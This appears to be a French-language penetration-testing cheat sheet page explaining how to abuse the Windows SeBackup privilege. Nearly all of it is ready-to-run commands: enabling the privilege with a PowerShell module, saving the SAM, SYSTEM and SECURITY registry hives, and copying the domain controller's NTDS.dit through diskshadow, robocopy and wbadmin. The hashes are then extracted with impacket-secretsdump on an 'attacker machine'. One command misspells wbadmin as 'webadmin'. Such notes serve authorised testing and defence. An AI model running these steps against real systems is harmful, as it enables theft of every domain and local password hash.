Aller au contenu

SeBackup

Le privilège SeBackup donne droit à l'utilisateur d'effectuer des sauvegardes. Le principe pour exploiter ce privilège est donc d'effectuer des sauvegardes du registre/de fichiers sensibles/etc afin d'obtenir les informations voulues.

Si le privilège est "disabled"

https://github.com/giuliano108/SeBackupPrivilege

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege

Ce qui permettra d'activer le privilège.


Sauvegarde du registre

Une sauvegarde du registre va permettre de récupérer les hash présents dans la SAM.

reg save HKLM\SECURITY security.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save

Une fois rapatrié sur notre poste attaquant, il est possible d'extraire les différents hash:

impacket-secretsdump -security security.save -system system.save -sam sam.save local

Sauvegarde du fichier NTDS.dit

Plusieurs méthodes sont possibles selon le contexte.

Diskshadow

Création d'un script "backup.txt" pour diskshadow:

set verbose on  
set metadata C:\Windows\Temp\meta.cab  
set context clientaccessible  
set context persistent  
begin backup  
add volume C: alias cdrive  
create  
expose %cdrive% E:  
end backup

Puis l'exécuter

diskshadow /s .\backup.txt

Robocopy

Ceci va créer une réplique de C: sur le lecteur E: => les fichiers de E: sont ensuite copiables.

robocopy /b E:\Windows\ntds . ntds.dit

Une fois rapatrié sur notre poste attaquant, il est possible d'extraire les différents hash

impacket-secretsdump -system system.save -ntds ntds.dit local

Wbadmin

Wbadmin permet de créer un backup

wbadmin start backup -quiet -backuptarget:\\dc01\c$\temp -include:c:\windows\ntds

On récupère ensuite la version du backup

wbadmin get versions

Puis on la restore à un endroit accessible

webadmin start recovery -quiet -version:07/26/2021-03:16 -itemtype:file -item:c:\windows\ntds\ntds.dit -recoverytarget:c:\temp -notrestoreacl

Une fois rapatrié sur notre poste attaquant, il est possible d'extraire les différents hash

impacket-secretsdump -system system.save -ntds ntds.dit local